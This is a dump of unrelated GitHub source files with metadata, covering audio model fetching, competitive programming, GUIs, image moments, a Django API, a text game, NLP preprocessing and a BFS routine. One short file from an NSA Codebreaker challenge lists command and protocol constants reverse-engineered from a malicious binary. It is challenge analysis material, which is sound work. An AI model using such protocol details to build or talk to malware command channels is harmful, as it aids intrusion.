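p2 = fetch("model.ckpt", source="/data/checkpoints")                              # local dir -> symlink
p3 = fetch("vocab.txt", source="https://example.com/models")                      # web download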
destination\n","repo_name":"speechbrain/speechbrain","sub_path":"speechbrain/pretrained/fetching.py","file_name":"fetching.py","file_ext":"py","file_size_in_byte":6510,"program_lang":"python","lang":"en","doc_type":"code","stars":6855,"dataset":"github-code","pt":"52"} +{"seq_id":"9612310099","text":"#!/usr/bin/env python3\n# -*- coding: UTF-8 -*-\n#import sys\n#input=sys.stdin.readline\n\ns=input()\nx=len(s)\nans=[0]*x\nchk=[0,0]\nf=0\nfor i in range(x):\n if s[i]==\"R\":\n chk[i%2]+=1\n if s[i]==\"L\":\n if i%2:\n ans[i-1]+=chk[0]\n ans[i]+=chk[1]\n else:\n ans[i]+=chk[0]\n ans[i-1]+=chk[1]\n\n chk=[0,0]\nchk=[0,0]\nfor i in range(x-1,-1,-1):\n if s[i]==\"L\":\n chk[i%2]+=1\n if s[i]==\"R\":\n if i%2:\n ans[i+1]+=chk[0]\n ans[i]+=chk[1]\n else:\n ans[i]+=chk[0]\n ans[i+1]+=chk[1]\n chk=[0,0]\n \nprint(*ans)\n","repo_name":"clarinet758/atcoder","sub_path":"abc/b126_150/b136/d1.py","file_name":"d1.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33151095920","text":"import os\nimport logging\nimport logging.config\n\ncfg = {\n \"version\": 1,\n \"formatters\": {\n \"formatter\": {\n \"format\": \"%(asctime)s - %(ms)s \\ %(method)s: %(message)s\"\n }\n },\n \"handlers\": {\n \"handler\": {\n \"class\": \"logging.FileHandler\",\n \"formatter\": \"formatter\",\n \"filename\":\n os.path.abspath(\n os.path.join(\n os.path.join(\n os.path.join(\n os.path.dirname(__file__), \"..\"), \"logs\"), \"app.log\")),\n \"mode\": \"a\"\n }\n },\n \"loggers\": {\n \"logger\": {\n \"handlers\": [\"handler\"],\n \"level\": \"DEBUG\"\n }\n }\n}\n\nlogging.config.dictConfig(cfg)\nlogger = logging.getLogger(\"logger\")\n","repo_name":"sys321/python_bootcamp_hw_22_2","sub_path":"common/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18378363734","text":"import tkinter as tk\nfrom tkinter import messagebox\nfrom tkinter import filedialog\n\nimport random\n\nfrom source.components.menu import Menu\nfrom source.components.canvas import Canvas\nfrom source.components.tools import *\n\n# Window parameters\nWIDTH = 1000\nHEIGHT = 600\nSCALE = 1.5\n\n# Adobe flat UI colour scheme\nDARK_BLUE = \"#2C3E50\"\nMEDIUM_BLUE = \"#2980B9\"\nLIGHT_BLUE = \"#3498DB\"\nRED = \"#E74C3C\"\nWHITE = \"#ECF0F1\"\n\n# Colour parameters\nCANVAS_BACKGROUND = WHITE\n\n# Dimensions\nFRAME_OPTIONS = {\"padx\":10}\n\nclass View(tk.Tk):\n \"\"\"This class implements the \"view\" part of the MVC architectural pattern.\"\"\"\n\n def __init__(self, *args, **kwargs):\n super(View, self).__init__(*args, **kwargs)\n self.title(\"Probabilistic ray model of energy propagation\")\n\n self.menu = Menu(self)\n self.config(menu=self.menu)\n\n self.canvas = Canvas(self, height=100, width=WIDTH, bg=CANVAS_BACKGROUND)\n self.canvas.pack(fill=tk.BOTH, expand=tk.YES)\n\n self.toolbar = CreationTools(self, **FRAME_OPTIONS)\n self.toolbar.pack(fill=tk.BOTH, expand=tk.NO)\n\n self.minsize(width=WIDTH, height=HEIGHT)\n\n self.controller = None\n\n def register(self, controller):\n \"\"\"\n This method registers the controller to send requests to.\n \"\"\"\n self.controller = controller\n\n def switch_tools(self, tools):\n \"\"\"\n This method switches toolbar to requested tools.\n \"\"\"\n self.toolbar.pack_forget()\n self.toolbar.destroy()\n self.remove_binds()\n if tools == \"CreationTools\":\n self.toolbar = 
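# [Editor's note] The format string in the dictConfig above references the
# non-standard record fields %(ms)s and %(method)s, so every logging call must
# supply both through ``extra`` or formatting fails at emit time; values here
# are illustrative.
logger.info("request handled", extra={"ms": 42, "method": "GET"})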
CreationTools(self, **FRAME_OPTIONS)\n elif tools == \"MovingTools\":\n self.toolbar = MovingTools(self, **FRAME_OPTIONS)\n self.add_bind(tools)\n elif tools == \"DeletingTools\":\n self.toolbar = DeletingTools(self, **FRAME_OPTIONS)\n self.add_bind(tools)\n elif tools == \"ModifyingTools\":\n self.toolbar = ModifyingTools(self, **FRAME_OPTIONS)\n elif tools == \"CustomisingTools\":\n self.toolbar = CustomisingTools(self, **FRAME_OPTIONS)\n self.add_bind(tools)\n elif tools == \"ModelTools\":\n self.toolbar = ModelTools(self, **FRAME_OPTIONS)\n else:\n raise ValueError(\"No such tools.\")\n self.toolbar.pack(fill=tk.BOTH, expand=tk.NO)\n\n def refresh_canvas(self, adjacency, positions, modified, selected=False):\n \"\"\"\n This method refreshes canvas based on the received data.\n \"\"\"\n self.canvas.refresh_canvas(adjacency, positions, modified, selected)\n\n def remove_binds(self):\n \"\"\"\n This method removes all binds from the canvas.\n \"\"\"\n self.canvas.remove_binds()\n\n def add_bind(self, tools):\n \"\"\"\n This method adds requested bind to canvas.\n \"\"\"\n if tools == \"MovingTools\":\n self.canvas.add_moving_bind()\n elif tools == \"DeletingTools\":\n self.canvas.add_deleting_bind()\n elif tools == \"CustomisingTools\":\n self.canvas.add_selecting_bind()\n else:\n raise ValueError(\"No such tools.\")\n\n def show_message(self, title, message):\n \"\"\"\n This method displays the message box with requested title and a message.\n \"\"\"\n messagebox.showinfo(title, message)\n\n def save_as(self, extension):\n \"\"\"\n This method displays the file dialog box to save file and returns the\n file name.\n \"\"\"\n filename = filedialog.asksaveasfile(mode='w', defaultextension=extension)\n if filename is None:\n return None\n return filename.name\n\n def open(self):\n \"\"\"\n This method displays the file dialog box to open file and returns the\n file name.\n \"\"\"\n filename = filedialog.askopenfilename()\n if filename == '':\n return None\n return filename\n\n def resize_window(self, option):\n \"\"\"\n This method sets new minimal size of the window.\n \"\"\"\n if option == \"small\":\n self.minsize(width=int(WIDTH/SCALE), height=int(HEIGHT/SCALE))\n elif option == \"medium\":\n self.minsize(width=int(WIDTH), height=int(HEIGHT))\n elif option == \"large\":\n self.minsize(width=int(WIDTH*SCALE), height=int(HEIGHT*SCALE))\n\n\n def change_background(self):\n \"\"\"\n This method changes background colour to some random value.\n \"\"\"\n red = hex(random.randint(150, 255))[2:]\n green = hex(random.randint(150, 255))[2:]\n blue = hex(random.randint(150, 255))[2:]\n self.canvas.configure(bg=\"#{0}{1}{2}\".format(red, green, blue))\n","repo_name":"janzmazek/wave-propagation","sub_path":"source/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":4727,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"42092827988","text":"# magic number constants from malicious make binary\nMAGIC_START = b\"\\x14\\x42\\x40\\x73\"\nMAGIC_END = b\"\\xe6\\x4f\\x14\\x95\"\n\nCMD_LENGTH = b\"\\x00\\x02\"\nUUID_LENGTH = b\"\\x00\\x10\"\n\nPARAM_CMD = b\"\\x4e\\x00\"\nPARAM_UUID = b\"\\x4e\\x08\"\nPARAM_DIRNAME = b\"\\x4e\\x14\"\nPARAM_FILENAME = b\"\\x4e\\x1c\"\nPARAM_CONTENTS = b\"\\x4e\\x20\"\nPARAM_MORE = b\"\\x4e\\x24\"\nPARAM_CODE = b\"\\x4e\\x28\"\nPARAM_TASKNAME = b\"\\x4e\\x18\"\n\nCOMMAND_INIT = b\"\\x00\\x02\"\nCOMMAND_REQUEST = b\"\\x00\\x03\"\nCOMMAND_LS = b\"\\x00\\x04\"\nCOMMAND_CAT = b\"\\x00\\x05\"\nCOMMAND_UPLOAD 
= b\"\\x00\\x06\"\nCOMMAND_FIN = b\"\\x00\\x07\"\n","repo_name":"hakkilab/NSACC2021","sub_path":"Task09/magic_constants.py","file_name":"magic_constants.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37020499431","text":"#Embedded file name: e:\\jenkins\\workspace\\client_SERENITY\\branches\\release\\SERENITY\\eve\\client\\script\\ui\\view\\stationView.py\r\nimport sys\r\nfrom eveSpaceObject import spaceobjaudio\r\nimport evetypes\r\nimport inventorycommon.typeHelpers\r\nfrom inventorycommon.util import IsShipFittingFlag\r\nfrom eve.common.script.net import eveMoniker\r\nimport log\r\nimport trinity\r\nimport util\r\nimport uthread\r\nimport blue\r\nfrom eve.client.script.ui.services.viewStateSvc import View\r\nfrom eve.client.script.ui.inflight import shipstance\r\nfrom eveSpaceObject import spaceobjanimation\r\nimport evegraphics.utils as gfxutils\r\n\r\nclass StationView(View):\r\n __guid__ = 'viewstate.StationView'\r\n __notifyevents__ = ['OnDogmaItemChange',\r\n 'ProcessActiveShipChanged',\r\n 'OnActiveShipSkinChange',\r\n 'OnDamageStateChanged']\r\n __dependencies__ = ['godma',\r\n 'loading',\r\n 'station',\r\n 'invCache',\r\n 't3ShipSvc',\r\n 'sceneManager',\r\n 'clientDogmaIM']\r\n __overlays__ = {'sidePanels'}\r\n\r\n def __init__(self):\r\n View.__init__(self)\r\n self.activeshipmodel = None\r\n\r\n def ShowShip(self, shipID, maintainZoomLevel = False):\r\n self.WaitForShip(shipID)\r\n hangarInv = self.invCache.GetInventory(const.containerHangar)\r\n hangarItems = hangarInv.List()\r\n for each in hangarItems:\r\n if each.itemID == shipID:\r\n self.activeShipItem = each\r\n try:\r\n uthread.new(self.ShowActiveShip, maintainZoomLevel)\r\n except Exception as e:\r\n log.LogException('Failed to show ship')\r\n sys.exc_clear()\r\n\r\n break\r\n\r\n def HideView(self):\r\n interiorScene = sm.GetService('sceneManager').GetActiveScene()\r\n if interiorScene:\r\n for cs in interiorScene.curveSets:\r\n for binding in cs.bindings:\r\n binding.copyValueCallable = None\r\n\r\n del cs.bindings[:]\r\n del cs.curves[:]\r\n\r\n View.HideView(self)\r\n\r\n def WaitForShip(self, shipID):\r\n maximumWait = 10000\r\n sleepUnit = 100\r\n iterations = maximumWait / sleepUnit\r\n while util.GetActiveShip() != shipID and iterations:\r\n iterations -= 1\r\n blue.pyos.synchro.SleepWallclock(sleepUnit)\r\n\r\n if util.GetActiveShip() != shipID:\r\n raise RuntimeError('Ship never came :(')\r\n self.LogInfo('Waited for ship for %d iterations.' 
% (maximumWait / sleepUnit - iterations))\r\n\r\n def SetupAnimation(self, model, shipItem):\r\n if model is None:\r\n return\r\n if not evetypes.Exists(shipItem.typeID):\r\n return\r\n animationStates = inventorycommon.typeHelpers.GetAnimationStates(shipItem.typeID)\r\n spaceobjanimation.LoadAnimationStates(animationStates, cfg.graphicStates, model, trinity)\r\n if model.animationSequencer is not None:\r\n model.animationSequencer.GoToState('normal')\r\n spaceobjanimation.SetShipAnimationStance(model, shipstance.get_ship_stance(shipItem.itemID, shipItem.typeID))\r\n\r\n def OnDogmaItemChange(self, item, change):\r\n if item.locationID == change.get(const.ixLocationID, None) and item.flagID == change.get(const.ixFlag):\r\n return\r\n activeShipID = util.GetActiveShip()\r\n if item.locationID == activeShipID and IsShipFittingFlag(item.flagID) and item.categoryID == const.categorySubSystem:\r\n self.ShowShip(activeShipID)\r\n\r\n def OnActiveShipSkinChange(self, itemID, skinID):\r\n if session.stationid2 is None:\r\n return\r\n if not hasattr(self, 'activeShipItem'):\r\n return\r\n if itemID == self.activeShipItem.itemID:\r\n self.ShowShip(self.activeShipItem.itemID, maintainZoomLevel=True)\r\n\r\n def OnDamageStateChanged(self, itemID):\r\n if self.activeShipItem.itemID == itemID:\r\n shieldState, armorState, hullState = self.GetDamageState(self.activeShipItem.itemID)\r\n self.activeshipmodel.SetImpactDamageState(shieldState, armorState, hullState, False)\r\n\r\n def ProcessActiveShipChanged(self, shipID, oldShipID):\r\n if oldShipID != shipID:\r\n self.ShowShip(shipID)\r\n\r\n def SetupAnimationUpdaterAudio(self, newModel):\r\n if hasattr(newModel, 'animationUpdater'):\r\n newModel.animationUpdater.eventListener = self.generalAudioEntity\r\n\r\n def GetDamageState(self, itemID):\r\n shieldState, armorState, hullState = sm.GetService('clientDogmaIM').GetDogmaLocation().GetDamageStateEx(itemID)\r\n if isinstance(shieldState, tuple):\r\n shieldState = shieldState[0]\r\n return (shieldState, armorState, hullState)\r\n\r\n def SetupShipModel(self, newModel):\r\n itemID = self.activeShipItem.itemID\r\n dirtTimeStamp = eveMoniker.GetShipAccess().GetDirtTimestamp(itemID)\r\n dirtLevel = gfxutils.CalcDirtLevelFromAge(dirtTimeStamp)\r\n newModel.dirtLevel = dirtLevel\r\n killCounter = sm.RemoteSvc('shipKillCounter').GetItemKillCountPlayer(itemID)\r\n newModel.displayKillCounterValue = min(killCounter, 999)\r\n shieldState, armorState, hullState = self.GetDamageState(itemID)\r\n newModel.SetImpactDamageState(shieldState, armorState, hullState, True)\r\n\r\n def SetupGeneralAudioEntity(self, newModel):\r\n if newModel is not None and hasattr(newModel, 'observers'):\r\n self.generalAudioEntity = spaceobjaudio.SetupAudioEntity(newModel)\r\n","repo_name":"connoryang/dec-eve-serenity","sub_path":"client/eve/client/script/ui/view/stationView.py","file_name":"stationView.py","file_ext":"py","file_size_in_byte":5520,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"38973512145","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Nov 24 13:21:36 2019\n\n@author: Carter\n\"\"\"\n\nimport numpy as np\n\n#try switching x and y\n\ndef moment(im,i,j):\n moment = 0\n x,y = im.shape\n for k in range(x):\n for l in range(y):\n moment = moment + k**i*l**j*im[k,l]\n return moment\n\ndef cen_mom(im,x_bar,y_bar,p,q):\n moment = 0\n x,y = im.shape\n for k in range(x):\n for l in range(y):\n moment = moment + (k-x_bar)**p*(l-y_bar)**q*im[k,l]\n return 
moment\n \n \ndef huMoments(H):\n #make sure H is normalized\n large = np.max(H) \n H = H/large\n print(H.shape)\n \n #caluculate X_bar and Y_bar\n m00 = moment(H,0,0)\n m10 = moment(H,1,0)\n m01 = moment(H,0,1)\n \n x_bar = m10/m00\n y_bar = m01/m00\n \n #get central moments\n cm20 = cen_mom(H,x_bar,y_bar,2,0)\n cm02 = cen_mom(H,x_bar,y_bar,0,2)\n cm11 = cen_mom(H,x_bar,y_bar,1,1)\n cm30 = cen_mom(H,x_bar,y_bar,3,0)\n cm03 = cen_mom(H,x_bar,y_bar,0,3)\n cm12 = cen_mom(H,x_bar,y_bar,1,2)\n cm21 = cen_mom(H,x_bar,y_bar,2,1)\n \n #calculate Hu Moments\n h1 = cm20 + cm02\n h2 = (cm20 - cm02)**2 + 4*cm11**2\n h3 = (cm30- 3*cm12)**2 + (3*cm21-cm03)**2\n h4 = (cm30 + cm12)**2 + (cm21+cm03)**2\n h5 = (cm30 - 3*cm12)*(cm30+cm12)*((cm30+cm12)**2 -3*(cm21+cm03)**2) + (3*cm21 - cm03)*(cm21 + cm03)*(3*(cm30+cm12)**2 - (cm21 + cm03)**2)\n h6 = (cm20 - cm02)*((cm30+ cm12)**2 -(cm21 + cm03)**2) + 4*cm11*(cm30+cm12)*(cm21 + cm03)\n h7 = (3*cm21 - cm03)*(cm30+cm12)*((cm30 +cm12)**2 - 3*(cm21 + cm03)**2) - (cm30 - 3*cm12)*(cm21 + cm03)*(3*(cm30 + cm12)**2 - (cm21 +cm03)**2)\n \n \n return [h1,h2,h3,h4,h5,h6,h7]\n\n\n#main code\nMHIs = np.load('allMHI_2.npy')\n\nhuVectors = []\nfor i in range(len(MHIs)):\n im1 = MHIs[i,:,:]\n moments = huMoments(im1)\n huVectors.append(moments)\n\n\nhuVectors = np.asarray(huVectors)\nnp.save('huVectors_3.npy',huVectors)","repo_name":"carterprice2/Computer_Vision","sub_path":"PS5/Price_Leon_Carter_PS5_py/huMoments.py","file_name":"huMoments.py","file_ext":"py","file_size_in_byte":1913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10445109978","text":"from datetime import datetime\n\nfrom django_filters import rest_framework as filters\nfrom rest_framework import viewsets, status\nfrom rest_framework.response import Response\nfrom drf_yasg2.utils import swagger_auto_schema\n\n\nfrom apps.visums.models import CampVisum\nfrom apps.visums.filters import CampVisumFilter\nfrom apps.visums.services import CampVisumService\nfrom apps.locations.models import CampLocation\nfrom apps.locations.serializers import CampLocationMinimalSerializer\nfrom apps.camps.serializers import CampMinimalSerializer\nfrom apps.visums.models import LinkedCategory\nfrom apps.visums.models import LinkedSubCategory\nfrom apps.visums.models import LinkedLocationCheck\nfrom apps.camps.models.camp_year import CampYear\n\nfrom scouts_auth.scouts.permissions import ScoutsFunctionPermissions\nfrom scouts_auth.groupadmin.serializers.scouts_group_serializer import (\n ScoutsGroupSerializer,\n)\nfrom scouts_auth.groupadmin.models.scouts_group import ScoutsGroup\nfrom scouts_auth.groupadmin.models.scouts_user import ScoutsUser\n\n# LOGGING\nimport logging\nfrom scouts_auth.inuits.logging import InuitsLogger\n\n\nlogger: InuitsLogger = logging.getLogger(__name__)\n\n\nclass CampVisumLocationViewSet(viewsets.GenericViewSet):\n \"\"\"\n A viewset for viewing camp location.\n \"\"\"\n\n serializer_class = CampLocationMinimalSerializer\n queryset = CampVisum.objects.all()\n permission_classes = (ScoutsFunctionPermissions,)\n filter_backends = [filters.DjangoFilterBackend]\n filterset_class = CampVisumFilter\n\n camp_visum_service = CampVisumService()\n\n @swagger_auto_schema(responses={status.HTTP_200_OK: CampLocationMinimalSerializer})\n def list(self, request):\n # HACKETY HACK\n # This should probably be handled by a rest call when changing groups in the frontend,\n # but adding it here avoids the need for changes to the frontend\n\n user: ScoutsUser = 
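# [Editor's example] A vectorized equivalent of moment()/cen_mom() above -- the
# double Python loops cost O(rows*cols) interpreter iterations per call, while
# np.indices lets NumPy do the same sum in C -- plus a toy call to huMoments().
# The 8x8 test image is illustrative.
def moment_fast(im, i, j):
    k, l = np.indices(im.shape)
    return np.sum(k ** i * l ** j * im)

def cen_mom_fast(im, x_bar, y_bar, p, q):
    k, l = np.indices(im.shape)
    return np.sum((k - x_bar) ** p * (l - y_bar) ** q * im)

toy = np.zeros((8, 8))
toy[2:6, 3:5] = 1.0
h1, h2, h3, h4, h5, h6, h7 = huMoments(toy)  # the seven Hu descriptors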
request.user\n        group_admin_id = self.request.GET.get(\"group\", None)\n        year: int = self.request.GET.get(\"year\")\n        year: CampYear = CampYear.objects.get(year=year)\n\n        if group_admin_id == \"any\":\n            campvisums = set(CampVisum.objects.all().filter(year=year))\n        else:\n            campvisums = set(\n                CampVisum.objects.all().filter(group=group_admin_id, year=year)\n            )\n\n        locations = list()\n        date_in_range = True\n\n        if request.query_params.get(\"start_date\"):\n            start_date = datetime.strptime(\n                request.query_params.get(\"start_date\"),\n                \"%Y-%m-%d\",\n            ).date()\n        else:\n            start_date = None\n\n        if request.query_params.get(\"end_date\"):\n            end_date = datetime.strptime(\n                request.query_params.get(\"end_date\"),\n                \"%Y-%m-%d\",\n            ).date()\n        else:\n            end_date = None\n\n        for campvisum in campvisums:\n            group: ScoutsGroup = user.get_scouts_group(campvisum.group)\n            if start_date and end_date:\n                date_in_range = False\n                if (campvisum.start_date and campvisum.start_date >= start_date) and (\n                    campvisum.end_date and campvisum.end_date <= end_date\n                ):\n                    date_in_range = True\n            elif start_date:\n                date_in_range = False\n                if campvisum.start_date and campvisum.start_date >= start_date:\n                    date_in_range = True\n            elif end_date:\n                date_in_range = False\n                if campvisum.end_date and campvisum.end_date <= end_date:\n                    date_in_range = True\n\n            if date_in_range:\n                location = campvisum.location\n                if location:\n                    location[\"camp\"] = CampMinimalSerializer(\n                        campvisum, many=False\n                    ).data\n                    location[\"camp\"][\"group\"] = ScoutsGroupSerializer(\n                        group, many=False\n                    ).data\n                    locations.append(location)\n        return Response(locations)\n","repo_name":"ScoutsGidsenVL/kampvisum-backend","sub_path":"scouts_kampvisum_api/apps/visums/views/visum_location_views.py","file_name":"visum_location_views.py","file_ext":"py","file_size_in_byte":4106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72129282724","text":"import random\nimport time\ndef mostrarIntro(): # def creates a function\n    print('You are in a land full of dragons. In front of you')\n    print('are two caves. In one of them, the dragon is generous and')\n    print('friendly and will share its treasure with you. The other dragon')\n    print('is greedy and hungry, and will devour you immediately.')\n    print()\ndef elegirCueva(): # function that asks which cave to choose\n    cueva = '' # declares the variable that will store the choice\n    while cueva != '1' and cueva != '2': #true and true\n        print(\"Which cave do you choose? (1 or 2)\")\n        cueva = input()\n    return cueva\ndef explorarCueva(cuevaElegida): # shows the results of the game\n    time.sleep(2)\n    print('It is dark and spooky...')\n    time.sleep(2)\n    print('The dragon suddenly appears in front of you! It opens its jaws and...')\n    print()\n    time.sleep(2)\n    cuevaAmigable = random.randint(1,2) # randomly selects one of the two options\n    if cuevaElegida == str(cuevaAmigable): # compares the choice with the friendly cave\n        print(\"It gives you a treasure!\")\n    else:\n        print(\"It breathes fire at you!\")\njugarDeNuevo = \"si\"\nwhile jugarDeNuevo == \"si\" or jugarDeNuevo == \"s\": # asks whether you want to run the code again\n    mostrarIntro()\n    numeroDeCueva = elegirCueva()\n    explorarCueva(numeroDeCueva)\n    print(\"Do you want to play again? (si or no)\")\n    jugarDeNuevo = input()","repo_name":"ericsolis8/curso_Python","sub_path":"dragon.py","file_name":"dragon.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"}
{"seq_id":"70338437925","text":"import pandas as pd\nimport string\nimport textract\nimport requests\nimport nltk\nfrom nltk.corpus import stopwords\nfrom nltk.stem import WordNetLemmatizer\nfrom nltk import pos_tag\nfrom nltk.stem import PorterStemmer\n\ndata = pd.read_csv('federal_sample_20170408 - federal_sample_20170408.csv')\n\ndata = data[data['new_misconduct_determination'].notnull()]\ndata['new_misconduct_determination'] = data['new_misconduct_determination'].str.strip()\ndata['new_misconduct_determination'] = data['new_misconduct_determination'].str.lower()\ndata = data.replace('na', 'no')\n\nif len(set(data['new_misconduct_determination'])) == 2:\n    \n    data = data[['txt_link', 'new_misconduct_determination']]\n    data = data.replace('yes', 1)\n    data = data.replace('no', 0)\n    \n    nltk_stopwords = stopwords.words('english')\n    custom_stopwords = set(w.rstrip() for w in open('stopwords.txt'))\n    stopwords = custom_stopwords.union(nltk_stopwords)\n    \n    data_to_export = pd.DataFrame(columns=['case_text', 'misconduct'])\n    \n    def preprocessing(text):\n        \n        text2 = ' '.join(''.join([' ' if ch in string.punctuation else ch for ch in text]).split())\n        tokens = [word for sent in nltk.sent_tokenize(text2) for word in nltk.word_tokenize(sent)]\n        tokens = [word.lower() for word in tokens]\n        tokens = [token for token in tokens if token not in stopwords]\n        tokens = [word for word in tokens if len(word) >= 3]\n        \n        # stemmer = PorterStemmer()\n        # tokens = [stemmer.stem(word) for word in tokens]\n        \n        tokens = [t for t in tokens if not any(c.isdigit() for c in t)]\n        tagged_corpus = pos_tag(tokens)\n        \n        Noun_tags = ['NN','NNP','NNPS','NNS']\n        Verb_tags = ['VB','VBD','VBG','VBN','VBP','VBZ']\n        \n        lemmatizer = WordNetLemmatizer()\n        \n        def prat_lemmatize(token,tag):\n            if tag in Noun_tags: return lemmatizer.lemmatize(token, 'n')\n            elif tag in Verb_tags: return lemmatizer.lemmatize(token, 'v')\n            else: return lemmatizer.lemmatize(token,'n')\n        \n        pre_proc_text = ' '.join([prat_lemmatize(token,tag) for token,tag in tagged_corpus])\n        \n        return pre_proc_text\n\n    for i, row in data.iterrows():\n        url = row['txt_link']\n        if \"https://drive.google.com\" in url:\n            file_id = url[41: -18]\n            url = 'https://drive.google.com/a/bu.edu/uc?id=' + file_id +'&export=download'\n            res = requests.get(url)\n            open(file_id + '.rtf', 'wb').write(res.content)\n            text = textract.process(file_id + '.rtf')\n            # call to preprocessing function can be deleted to have original text\n            data_to_export = data_to_export.append({'case_text': preprocessing(text.decode()), 'misconduct': row['new_misconduct_determination']}, ignore_index=True)\n        else:\n            res = requests.get(url)\n            data_to_export = data_to_export.append({'case_text': preprocessing(res.text), 'misconduct': row['new_misconduct_determination']}, ignore_index=True)\n\n    data_to_export.to_csv('preprocessed_data.csv', index=False)","repo_name":"rcallah/Spark-Project","sub_path":"spark_code/neural_net/preprocessing/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":3124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4210938053","text":"from argparse import ArgumentParser, Namespace\nfrom logging import Logger\nfrom pathlib import Path\nfrom 
tempfile import gettempdir\n\nfrom pronunciation_dictionary import (DeserializationOptions, MultiprocessingOptions,\n SerializationOptions)\n\nfrom pronunciation_dictionary_utils import remove_symbols_from_pronunciations\nfrom pronunciation_dictionary_utils_cli.argparse_helper import (ConvertToOrderedSetAction,\n add_io_group, add_mp_group,\n get_optional, parse_existing_file,\n parse_non_empty_or_whitespace,\n parse_path)\nfrom pronunciation_dictionary_utils_cli.io import try_load_dict, try_save_dict\n\nDEFAULT_EMPTY_WEIGHT = 1\n\n\ndef get_pronunciations_remove_symbols_parser(parser: ArgumentParser):\n default_removed_out = Path(gettempdir()) / \"removed-words.txt\"\n parser.description = \"Remove symbols from pronunciations.\"\n parser.add_argument(\"dictionary\", metavar='DICTIONARY',\n type=parse_existing_file, help=\"dictionary file\")\n parser.add_argument(\"symbols\", type=str, metavar='SYMBOL', nargs='+',\n help=\"remove these symbols from the pronunciations\", action=ConvertToOrderedSetAction)\n parser.add_argument(\"-m\", \"--mode\", type=str, choices=[\"all\", \"start\", \"end\", \"both\"], metavar=\"MODE\",\n help=\"mode to remove the symbols: all = on all locations; start = only from start; end = only from end; both = start + end\", default=\"both\")\n parser.add_argument(\"-k\", \"--keep-empty\", action=\"store_true\",\n help=\"if a pronunciation will be empty after removal, keep the corresponding word in the dictionary and assign the value of empty-symbol\")\n parser.add_argument(\"-es\", \"--empty-symbol\", metavar=\"SYMBOL\", type=get_optional(parse_non_empty_or_whitespace),\n help=\"if keep-empty: assign this symbol to the word where no pronunciations result because of the symbol removal\", default=\"sil\")\n parser.add_argument(\"-ro\", \"--removed-out\", metavar=\"PATH\", type=get_optional(parse_path),\n help=\"write removed words (i.e., words that had no pronunciation anymore) to this file\", default=default_removed_out)\n add_io_group(parser)\n add_mp_group(parser)\n return remove_symbols_from_pronunciations_ns\n\n\ndef remove_symbols_from_pronunciations_ns(ns: Namespace, logger: Logger, flogger: Logger) -> bool:\n if ns.keep_empty and ns.empty_symbol is None:\n logger.error(\"An empty symbol needs to be supplied if keep-empty is true!\")\n return False\n\n lp_options = DeserializationOptions(\n ns.consider_comments, ns.consider_numbers, ns.consider_pronunciation_comments, ns.consider_weights)\n mp_options = MultiprocessingOptions(ns.n_jobs, ns.maxtasksperchild, ns.chunksize)\n\n s_options = SerializationOptions(ns.parts_sep, ns.consider_numbers, ns.consider_weights)\n\n dictionary_instance = try_load_dict(ns.dictionary, ns.encoding, lp_options, mp_options, logger)\n if dictionary_instance is None:\n return False\n\n removed_words, changed_counter = remove_symbols_from_pronunciations(\n dictionary_instance, ns.symbols, ns.mode, ns.keep_empty, ns.empty_symbol, mp_options)\n\n if changed_counter == 0:\n logger.info(\"Didn't change anything.\")\n return True\n\n logger.info(f\"Changed pronunciations of {changed_counter} word(s).\")\n\n success = try_save_dict(dictionary_instance, ns.dictionary, ns.encoding, s_options, logger)\n if not success:\n return False\n\n logger.info(f\"Written dictionary to: \\\"{ns.dictionary.absolute()}\\\"\")\n\n if len(removed_words) > 0:\n logger.warning(f\"{len(removed_words)} words were removed.\")\n if ns.removed_out is not None:\n content = \"\\n\".join(removed_words)\n ns.removed_out.parent.mkdir(parents=True, exist_ok=True)\n try:\n 
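# [Editor's example] A command line matching the argparse spec above; the
# executable/subcommand names and file paths are illustrative assumptions.
#
#   dict-cli pronunciations-remove-symbols my.dict "'" "-" --mode both \
#       --keep-empty --empty-symbol sil --removed-out removed-words.txt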
ns.removed_out.write_text(content, \"UTF-8\")\n except Exception as ex:\n logger.debug(ex)\n logger.error(\"Removed words output couldn't be created!\")\n return False\n logger.info(f\"Written removed words to: \\\"{ns.removed_out.absolute()}\\\".\")\n else:\n logger.info(\"No words were removed.\")\n return True\n","repo_name":"stefantaubert/pronunciation-dictionary-utils","sub_path":"src/pronunciation_dictionary_utils_cli/pronunciations_remove_symbols.py","file_name":"pronunciations_remove_symbols.py","file_ext":"py","file_size_in_byte":4336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4364251999","text":"from collections import deque\nimport numpy as np\n\nclass bfs_node(object):\n def __init__(self, idx, links):\n self.idx = idx\n self.links = links\n self.depth = None\n\ndef forfor(a):\n return [item for sublist in a for item in sublist]\n\ndef get_bfs_order(edges, n_nodes):\n edges = list(zip(*edges))\n bfs_links = [[] for _ in range(n_nodes)]\n for i in range(n_nodes):\n for link_parent, link_son in edges:\n if link_parent == i:\n bfs_links[i].append(link_son)\n elif link_son == i:\n bfs_links[i].append(link_parent)\n bfs_nodes = [bfs_node(idx, links) for idx, links in enumerate(bfs_links)]\n queue = deque([bfs_nodes[0]])\n visited = set([bfs_nodes[0].idx])\n bfs_nodes[0].depth = 0\n order1,order2 = [],[]\n bfs_order = [0,]\n while len(queue) > 0:\n x = queue.popleft()\n for y in x.links:\n y = bfs_nodes[y]\n if y.idx not in visited:\n 